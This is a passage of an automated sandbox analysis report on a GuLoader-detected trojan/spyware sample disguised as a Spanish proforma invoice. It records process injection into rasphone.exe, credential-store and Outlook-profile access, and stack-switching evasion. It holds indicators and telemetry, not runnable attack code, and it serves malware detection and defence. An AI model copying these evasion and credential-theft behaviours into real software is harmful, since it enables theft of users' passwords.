              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048CFF404_2_048CFF40
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_0490FF634_2_0490FF63
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048C98B24_2_048C98B2
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_049018DA4_2_049018DA
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_049078F34_2_049078F3
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048538004_2_04853800
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_0490F8724_2_0490F872
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048598704_2_04859870
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_0486B8704_2_0486B870
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048C58704_2_048C5870
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048959C04_2_048959C0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_0490FA894_2_0490FA89
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_0486FAA04_2_0486FAA0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048E1B804_2_048E1B80
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_0488DB194_2_0488DB19
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_0490FB2E4_2_0490FB2E
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04C1F01D4_2_04C1F01D
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04C1E4634_2_04C1E463
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04C1E7FC4_2_04C1E7FC
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04C1E3454_2_04C1E345
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04C1D8C84_2_04C1D8C8
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: String function: 367BEF10 appears 104 times
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: String function: 36775050 appears 36 times
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: String function: 3672B910 appears 268 times
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: String function: 36787BE4 appears 90 times
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: String function: 367AE692 appears 86 times
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: String function: 048BE692 appears 86 times
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: String function: 04885050 appears 58 times
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: String function: 048CEF10 appears 105 times
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: String function: 0483B910 appears 278 times
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: String function: 04897BE4 appears 102 times
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000000.00000000.83096652287.0000000000453000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebrigitts.exe4 vs FACTURA PROFORMA MATRICULACI#U00d3N.exe
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84317744009.000000003667F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs FACTURA PROFORMA MATRICULACI#U00d3N.exe
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84426043945.00000000369D0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs FACTURA PROFORMA MATRICULACI#U00d3N.exe
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84314222092.00000000364CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs FACTURA PROFORMA MATRICULACI#U00d3N.exe
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000000.84196435867.0000000000453000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebrigitts.exe4 vs FACTURA PROFORMA MATRICULACI#U00d3N.exe
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs FACTURA PROFORMA MATRICULACI#U00d3N.exe
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84366862346.0000000006570000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamerasphone.exej% vs FACTURA PROFORMA MATRICULACI#U00d3N.exe
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84366862346.000000000657F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamerasphone.exej% vs FACTURA PROFORMA MATRICULACI#U00d3N.exe
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/10@3/2
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 0_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_0040351C
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 0_2_004049B1 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004049B1
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 0_2_004021CF LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,0_2_004021CF
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmakeJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeFile created: C:\Users\user\AppData\Local\Temp\nseB9BC.tmpJump to behavior
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: rasphone.exe, 00000004.00000002.84736393349.00000000029F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exeReversingLabs: Detection: 21%
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exeVirustotal: Detection: 25%
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeFile read: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe "C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeProcess created: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe "C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\rasphone.exe "C:\Windows\SysWOW64\rasphone.exe"
              Source: C:\Windows\SysWOW64\rasphone.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeProcess created: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe "C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"Jump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\rasphone.exe "C:\Windows\SysWOW64\rasphone.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: winsqlite3.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: militriskes.lnk.0.drLNK file: ..\..\..\..\..\..\..\Transformationsmodeller.Tri12
              Source: C:\Windows\SysWOW64\rasphone.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
              Source: FACTURA PROFORMA MATRICULACI#U00d3N.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: mshtml.pdb source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.0000000000649000.00000020.00000001.01000000.00000007.sdmp
              Source: Binary string: wntdll.pdbUGP source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84314222092.00000000363AA000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84317744009.0000000036552000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp, rasphone.exe, 00000004.00000003.84401648864.0000000004665000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: rasphone.pdb source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84366862346.0000000006570000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84314222092.00000000363AA000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84317744009.0000000036552000.00000004.00000020.00020000.00000000.sdmp, FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp, rasphone.exe, rasphone.exe, 00000004.00000003.84401648864.0000000004665000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: rasphone.pdbGCTL source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84366862346.0000000006570000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mshtml.pdbUGP source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000001.84198302200.0000000000649000.00000020.00000001.01000000.00000007.sdmp

              Data Obfuscation

              barindex
              Yara detected GuLoader
              Source: Yara matchFile source: 00000000.00000002.84200771924.0000000008C45000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.84398186443.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.84200771924.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.83100054536.00000000029FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\steelmake\bimlet\Reorganisere.Cir, type: DROPPED
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 0_2_707E1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_707E1BFF
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 0_2_707E30C0 push eax; ret 0_2_707E30EE
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367097A1 push es; iretd 2_2_367097A8
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367021AD pushad ; retf 0004h2_2_3670223F
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_367308CD push ecx; mov dword ptr [esp], ecx2_2_367308D6
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3643CF57 push ebx; rep ret 2_2_3643CF61
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36435496 pushad ; ret 2_2_364354A0
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36445252 push eax; ret 2_2_36445254
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36436B87 push ebx; iretd 2_2_36436B9F
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_36441BA1 pushad ; ret 2_2_36441BA4
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3643C86F push eax; ret 2_2_3643C870
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeCode function: 2_2_3643D01B push ebx; rep ret 2_2_3643CF61
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_006E886F push eax; ret 3_2_006E8870
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_006E901B push ebx; rep ret 3_2_006E8F61
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_006E1496 pushad ; ret 3_2_006E14A0
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_006F1252 push eax; ret 3_2_006F1254
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_006E1E18 pushad ; retf 3_2_006E1E19
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_006E1758 pushfd ; retf 3_2_006E1890
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_006E8F57 push ebx; rep ret 3_2_006E8F61
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_006EDBA1 pushad ; ret 3_2_006EDBA4
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_006E2B87 push ebx; iretd 3_2_006E2B9F
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_04918801 pushad ; retf 3_2_04918802
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_04927C3B push eax; ret 3_2_04927C3D
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_0492458A pushad ; ret 3_2_0492458D
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_0491F940 push ebx; rep ret 3_2_0491F94A
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_04919570 push ebx; iretd 3_2_04919588
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_0491FA04 push ebx; rep ret 3_2_0491F94A
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_0491F258 push eax; ret 3_2_0491F259
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 3_2_04917E7F pushad ; ret 3_2_04917E89
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_048408CD push ecx; mov dword ptr [esp], ecx4_2_048408D6
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04C15496 pushad ; ret 4_2_04C154A0
              Source: C:\Windows\SysWOW64\rasphone.exeCode function: 4_2_04C1D01B push ebx; rep ret 4_2_04C1CF61
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeFile created: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeFile created: C:\Users\user\AppData\Local\Temp\nskBC9B.tmp\LangDLL.dllJump to dropped file
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rasphone.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Switches to a custom stack to bypass stack traces
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeAPI/Special instruction interceptor: Address: 8ECAE36
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeAPI/Special instruction interceptor: Address: 567AE36
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeAPI/Special instruction interceptor: Address: 7FF8F0B90594
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeAPI/Special instruction interceptor: Address: 7FF8F0B8FF74
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeAPI/Special instruction interceptor: Address: 7FF8F0B8D6C4
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeAPI/Special instruction interceptor: Address: 7FF8F0B8D864
              Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exeAPI/Special instruction interceptor: Address: 7FF8F0B8D004
              Source: C:\Windows\SysWOW64\rasphone.exeAPI/Special instruction interceptor: Address: 7FF8F0B8D144
              Source: C:\Windows\SysWOW64\rasphone.exeAPI/Special instruction interceptor: Address: 7FF8F0B90594
